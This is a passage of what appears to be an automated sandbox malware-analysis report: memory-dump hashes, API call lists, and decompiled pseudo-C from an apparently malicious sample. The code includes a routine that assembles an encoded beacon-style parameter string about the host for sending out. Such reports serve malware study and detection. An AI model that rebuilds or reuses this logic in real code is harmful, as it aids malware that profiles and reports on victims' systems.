                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                                                                            • Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                                                                                                                                                                                                                                            • Instruction ID: f9fa0301489ebc3843b12fed4762f8d750a1744f6d6a5faf53dd4189651a6ce8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0D06C35E0026C9BCF20CA50C914BAAF3B6BB9A354F5500C999083721187302E82CE51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                                                            			E04878D23(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                                                            				intOrPtr* _t56;
                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                            				int _t77;
                                                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                                                            				int _t81;
                                                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                                                            				int _t86;
                                                                                                                                                                                                                                                            				intOrPtr* _t89;
                                                                                                                                                                                                                                                            				intOrPtr* _t90;
                                                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                                                                                                            				_t91 = __ecx;
                                                                                                                                                                                                                                                            				_t25 = __eax;
                                                                                                                                                                                                                                                            				_t105 = _a16;
                                                                                                                                                                                                                                                            				_v4 = 8;
                                                                                                                                                                                                                                                            				if(__eax == 0) {
                                                                                                                                                                                                                                                            					_t25 = GetTickCount();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t26 =  *0x487d018; // 0x9300c086
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t27 =  *0x487d014; // 0x3a87c8cd
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t28 =  *0x487d010; // 0xd8d2f808
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t29 =  *0x487d00c; // 0x81762942
                                                                                                                                                                                                                                                            				asm("bswap eax");
                                                                                                                                                                                                                                                            				_t30 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t3 = _t30 + 0x487e633; // 0x74666f73
                                                                                                                                                                                                                                                            				_t101 = wsprintfA(_t105, _t3, 2, 0x3d141, _t29, _t28, _t27, _t26,  *0x487d02c,  *0x487d004, _t25);
                                                                                                                                                                                                                                                            				_t33 = E04874077();
                                                                                                                                                                                                                                                            				_t34 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t4 = _t34 + 0x487e673; // 0x74707526
                                                                                                                                                                                                                                                            				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                                            				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                                            				_t102 = _t101 + _t37;
                                                                                                                                                                                                                                                            				_t96 = E04873CCD(_t91);
                                                                                                                                                                                                                                                            				if(_t96 != 0) {
                                                                                                                                                                                                                                                            					_t83 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t6 = _t83 + 0x487e8eb; // 0x736e6426
                                                                                                                                                                                                                                                            					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                                            					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _t96);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t97 = E04873F90();
                                                                                                                                                                                                                                                            				if(_t97 != 0) {
                                                                                                                                                                                                                                                            					_t78 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t8 = _t78 + 0x487e8f3; // 0x6f687726
                                                                                                                                                                                                                                                            					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                                            					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _t97);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t98 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				_a32 = E04871203(0x487d00a, _t98 + 4);
                                                                                                                                                                                                                                                            				_t42 =  *0x487d2c8; // 0x0
                                                                                                                                                                                                                                                            				if(_t42 != 0) {
                                                                                                                                                                                                                                                            					_t74 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t11 = _t74 + 0x487e8cd; // 0x3d736f26
                                                                                                                                                                                                                                                            					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                                            					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                                            					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t43 =  *0x487d2c4; // 0x0
                                                                                                                                                                                                                                                            				if(_t43 != 0) {
                                                                                                                                                                                                                                                            					_t71 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t13 = _t71 + 0x487e8c6; // 0x3d706926
                                                                                                                                                                                                                                                            					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_a32 != 0) {
                                                                                                                                                                                                                                                            					_t100 = RtlAllocateHeap( *0x487d238, 0, 0x800);
                                                                                                                                                                                                                                                            					if(_t100 != 0) {
                                                                                                                                                                                                                                                            						E048786C4(GetTickCount());
                                                                                                                                                                                                                                                            						_t50 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                                            						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                            						_t54 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                                            						_t56 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            						_t103 = E04876AB0(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                                            						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                            						if(_t103 != 0) {
                                                                                                                                                                                                                                                            							StrTrimA(_t103, 0x487c2a4);
                                                                                                                                                                                                                                                            							_push(_t103);
                                                                                                                                                                                                                                                            							_t62 = E04874561();
                                                                                                                                                                                                                                                            							_v16 = _t62;
                                                                                                                                                                                                                                                            							if(_t62 != 0) {
                                                                                                                                                                                                                                                            								_t89 = __imp__;
                                                                                                                                                                                                                                                            								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                                            								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                                            								_t90 = __imp__;
                                                                                                                                                                                                                                                            								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                                            								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                                            								_t68 = E048792A2(0xffffffffffffffff, _t100, _v28, _v24);
                                                                                                                                                                                                                                                            								_v52 = _t68;
                                                                                                                                                                                                                                                            								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                                            									E04879E85();
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								HeapFree( *0x487d238, 0, _v44);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _t103);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, 0, _t100);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _a24);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				HeapFree( *0x487d238, 0, _t105);
                                                                                                                                                                                                                                                            				return _a12;
                                                                                                                                                                                                                                                            			}
















































                                                                                                                                                                                                                                                            0x04878d23
                                                                                                                                                                                                                                                            0x04878d23
                                                                                                                                                                                                                                                            0x04878d23
                                                                                                                                                                                                                                                            0x04878d2a
                                                                                                                                                                                                                                                            0x04878d30
                                                                                                                                                                                                                                                            0x04878d38
                                                                                                                                                                                                                                                            0x04878d3a
                                                                                                                                                                                                                                                            0x04878d3a
                                                                                                                                                                                                                                                            0x04878d47
                                                                                                                                                                                                                                                            0x04878d52
                                                                                                                                                                                                                                                            0x04878d55
                                                                                                                                                                                                                                                            0x04878d60
                                                                                                                                                                                                                                                            0x04878d63
                                                                                                                                                                                                                                                            0x04878d68
                                                                                                                                                                                                                                                            0x04878d6b
                                                                                                                                                                                                                                                            0x04878d70
                                                                                                                                                                                                                                                            0x04878d73
                                                                                                                                                                                                                                                            0x04878d7f
                                                                                                                                                                                                                                                            0x04878d8c
                                                                                                                                                                                                                                                            0x04878d8e
                                                                                                                                                                                                                                                            0x04878d94
                                                                                                                                                                                                                                                            0x04878d99
                                                                                                                                                                                                                                                            0x04878da4
                                                                                                                                                                                                                                                            0x04878da6
                                                                                                                                                                                                                                                            0x04878da9
                                                                                                                                                                                                                                                            0x04878db0
                                                                                                                                                                                                                                                            0x04878db4
                                                                                                                                                                                                                                                            0x04878db6
                                                                                                                                                                                                                                                            0x04878dbb
                                                                                                                                                                                                                                                            0x04878dc7
                                                                                                                                                                                                                                                            0x04878dc9
                                                                                                                                                                                                                                                            0x04878dd5
                                                                                                                                                                                                                                                            0x04878dd7
                                                                                                                                                                                                                                                            0x04878dd7
                                                                                                                                                                                                                                                            0x04878de2
                                                                                                                                                                                                                                                            0x04878de6
                                                                                                                                                                                                                                                            0x04878de8
                                                                                                                                                                                                                                                            0x04878ded
                                                                                                                                                                                                                                                            0x04878df9
                                                                                                                                                                                                                                                            0x04878dfb
                                                                                                                                                                                                                                                            0x04878e07
                                                                                                                                                                                                                                                            0x04878e09
                                                                                                                                                                                                                                                            0x04878e09
                                                                                                                                                                                                                                                            0x04878e0f
                                                                                                                                                                                                                                                            0x04878e22
                                                                                                                                                                                                                                                            0x04878e26
                                                                                                                                                                                                                                                            0x04878e2d
                                                                                                                                                                                                                                                            0x04878e30
                                                                                                                                                                                                                                                            0x04878e35
                                                                                                                                                                                                                                                            0x04878e40
                                                                                                                                                                                                                                                            0x04878e42
                                                                                                                                                                                                                                                            0x04878e45
                                                                                                                                                                                                                                                            0x04878e45
                                                                                                                                                                                                                                                            0x04878e47
                                                                                                                                                                                                                                                            0x04878e4e
                                                                                                                                                                                                                                                            0x04878e51
                                                                                                                                                                                                                                                            0x04878e56
                                                                                                                                                                                                                                                            0x04878e60
                                                                                                                                                                                                                                                            0x04878e62
                                                                                                                                                                                                                                                            0x04878e6a
                                                                                                                                                                                                                                                            0x04878e83
                                                                                                                                                                                                                                                            0x04878e87
                                                                                                                                                                                                                                                            0x04878e93
                                                                                                                                                                                                                                                            0x04878e98
                                                                                                                                                                                                                                                            0x04878ea1
                                                                                                                                                                                                                                                            0x04878eb2
                                                                                                                                                                                                                                                            0x04878eb6
                                                                                                                                                                                                                                                            0x04878ebf
                                                                                                                                                                                                                                                            0x04878ec5
                                                                                                                                                                                                                                                            0x04878ed2
                                                                                                                                                                                                                                                            0x04878edf
                                                                                                                                                                                                                                                            0x04878ee5
                                                                                                                                                                                                                                                            0x04878ef1
                                                                                                                                                                                                                                                            0x04878ef7
                                                                                                                                                                                                                                                            0x04878ef8
                                                                                                                                                                                                                                                            0x04878eff
                                                                                                                                                                                                                                                            0x04878f03
                                                                                                                                                                                                                                                            0x04878f09
                                                                                                                                                                                                                                                            0x04878f10
                                                                                                                                                                                                                                                            0x04878f17
                                                                                                                                                                                                                                                            0x04878f1d
                                                                                                                                                                                                                                                            0x04878f24
                                                                                                                                                                                                                                                            0x04878f28
                                                                                                                                                                                                                                                            0x04878f33
                                                                                                                                                                                                                                                            0x04878f3a
                                                                                                                                                                                                                                                            0x04878f3e
                                                                                                                                                                                                                                                            0x04878f47
                                                                                                                                                                                                                                                            0x04878f47
                                                                                                                                                                                                                                                            0x04878f58
                                                                                                                                                                                                                                                            0x04878f58
                                                                                                                                                                                                                                                            0x04878f67
                                                                                                                                                                                                                                                            0x04878f67
                                                                                                                                                                                                                                                            0x04878f76
                                                                                                                                                                                                                                                            0x04878f76
                                                                                                                                                                                                                                                            0x04878f88
                                                                                                                                                                                                                                                            0x04878f88
                                                                                                                                                                                                                                                            0x04878f97
                                                                                                                                                                                                                                                            0x04878fa8

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04878D3A
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878D87
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878DA4
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878DC7
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04878DD7
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878DF9
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04878E09
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878E40
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04878E60
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04878E7D
                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04878E8D
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(05259570), ref: 04878EA1
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(05259570), ref: 04878EBF
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04878ED2,?,052595B0), ref: 04876ADB
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrlen.KERNEL32(?,?,?,04878ED2,?,052595B0), ref: 04876AE3
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: strcpy.NTDLL ref: 04876AFA
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: lstrcat.KERNEL32(00000000,?), ref: 04876B05
                                                                                                                                                                                                                                                              • Part of subcall function 04876AB0: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04878ED2,?,052595B0), ref: 04876B22
                                                                                                                                                                                                                                                            • StrTrimA.SHLWAPI(00000000,0487C2A4,?,052595B0), ref: 04878EF1
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrlen.KERNEL32(052587FA,00000000,00000000,745EC740,04878EFD,00000000), ref: 04874571
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrlen.KERNEL32(?), ref: 04874579
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrcpy.KERNEL32(00000000,052587FA), ref: 0487458D
                                                                                                                                                                                                                                                              • Part of subcall function 04874561: lstrcat.KERNEL32(00000000,?), ref: 04874598
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04878F10
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04878F17
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 04878F24
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 04878F28
                                                                                                                                                                                                                                                              • Part of subcall function 048792A2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 04879354
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04878F58
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04878F67
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,052595B0), ref: 04878F76
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04878F88
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 04878F97
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3080378247-0
                                                                                                                                                                                                                                                            • Opcode ID: 92ae633df1ca6353e117d50360681adcae55b92303620c56815ce0ce4a1e76e3
                                                                                                                                                                                                                                                            • Instruction ID: 06cea9ef428be21fd7534ae05644204fa990ebd22f9658d6c89639e34618050c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92ae633df1ca6353e117d50360681adcae55b92303620c56815ce0ce4a1e76e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3617D72500204AFE711AB68ECACF6A77E9EF48714F040E14FA48D7260DB39FC069B61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                                            			E0487AD95(long _a4, long _a8) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				LONG* _v28;
                                                                                                                                                                                                                                                            				long _v40;
                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                                                            				CHAR* _v52;
                                                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                                                            				CHAR* _v60;
                                                                                                                                                                                                                                                            				long _v64;
                                                                                                                                                                                                                                                            				signed int* _v68;
                                                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                                                                                                            				intOrPtr* _t82;
                                                                                                                                                                                                                                                            				intOrPtr* _t83;
                                                                                                                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                                                                                                                            				intOrPtr* _t90;
                                                                                                                                                                                                                                                            				intOrPtr* _t95;
                                                                                                                                                                                                                                                            				intOrPtr* _t98;
                                                                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                                                                            				intOrPtr* _t104;
                                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                                            				long _t116;
                                                                                                                                                                                                                                                            				void _t125;
                                                                                                                                                                                                                                                            				void* _t131;
                                                                                                                                                                                                                                                            				signed short _t133;
                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t138;
                                                                                                                                                                                                                                                            				signed int* _t139;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t139 = _a4;
                                                                                                                                                                                                                                                            				_v28 = _t139[2] + 0x4870000;
                                                                                                                                                                                                                                                            				_t115 = _t139[3] + 0x4870000;
                                                                                                                                                                                                                                                            				_t131 = _t139[4] + 0x4870000;
                                                                                                                                                                                                                                                            				_v8 = _t139[7];
                                                                                                                                                                                                                                                            				_v60 = _t139[1] + 0x4870000;
                                                                                                                                                                                                                                                            				_v16 = _t139[5] + 0x4870000;
                                                                                                                                                                                                                                                            				_v64 = _a8;
                                                                                                                                                                                                                                                            				_v72 = 0x24;
                                                                                                                                                                                                                                                            				_v68 = _t139;
                                                                                                                                                                                                                                                            				_v56 = 0;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_v48 = 0;
                                                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                            				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                            					_a8 =  &_v72;
                                                                                                                                                                                                                                                            					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t138 =  *_v28;
                                                                                                                                                                                                                                                            				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                                                                            				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                                                                            				_a4 = _t76;
                                                                                                                                                                                                                                                            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                                                                            				_v56 = _t80;
                                                                                                                                                                                                                                                            				_t81 = _t133 + 0x4870002;
                                                                                                                                                                                                                                                            				if(_t80 == 0) {
                                                                                                                                                                                                                                                            					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_v52 = _t81;
                                                                                                                                                                                                                                                            				_t82 =  *0x487d1a0; // 0x0
                                                                                                                                                                                                                                                            				_t116 = 0;
                                                                                                                                                                                                                                                            				if(_t82 == 0) {
                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                            					if(_t138 != 0) {
                                                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                                                            						_t83 =  *0x487d1a0; // 0x0
                                                                                                                                                                                                                                                            						_v48 = _t138;
                                                                                                                                                                                                                                                            						if(_t83 != 0) {
                                                                                                                                                                                                                                                            							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t116 != 0) {
                                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                                            							 *_a8 = _t116;
                                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                                            							_t85 =  *0x487d1a0; // 0x0
                                                                                                                                                                                                                                                            							if(_t85 != 0) {
                                                                                                                                                                                                                                                            								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                                            								_v48 = _t138;
                                                                                                                                                                                                                                                            								_v44 = _t116;
                                                                                                                                                                                                                                                            								 *_t85(5,  &_v72);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							return _t116;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                                            								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                                                                            								if(_t116 == 0) {
                                                                                                                                                                                                                                                            									_v40 = GetLastError();
                                                                                                                                                                                                                                                            									_t90 =  *0x487d19c; // 0x0
                                                                                                                                                                                                                                                            									if(_t90 != 0) {
                                                                                                                                                                                                                                                            										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									if(_t116 == 0) {
                                                                                                                                                                                                                                                            										_a4 =  &_v72;
                                                                                                                                                                                                                                                            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                                                                            										_t116 = _v44;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                                                                            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                                                                            									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                                                                            									if(_t116 != 0) {
                                                                                                                                                                                                                                                            										goto L32;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L27;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t98 =  *0x487d1a0; // 0x0
                                                                                                                                                                                                                                                            					if(_t98 == 0) {
                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                            						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                                                                                            						if(_t138 != 0) {
                                                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                                                            							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                                                                            								FreeLibrary(_t138);
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								if(_t139[6] != 0) {
                                                                                                                                                                                                                                                            									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                                            									if(_t102 != 0) {
                                                                                                                                                                                                                                                            										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                                                                            										_t125 =  *0x487d198; // 0x0
                                                                                                                                                                                                                                                            										 *_t102 = _t125;
                                                                                                                                                                                                                                                            										 *0x487d198 = _t102;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L18;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_v40 = GetLastError();
                                                                                                                                                                                                                                                            						_t104 =  *0x487d19c; // 0x0
                                                                                                                                                                                                                                                            						if(_t104 == 0) {
                                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                                            							_a8 =  &_v72;
                                                                                                                                                                                                                                                            							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                                                                            							return _v44;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                                                                            						if(_t138 != 0) {
                                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                                                                            					if(_t138 != 0) {
                                                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                                                            					}
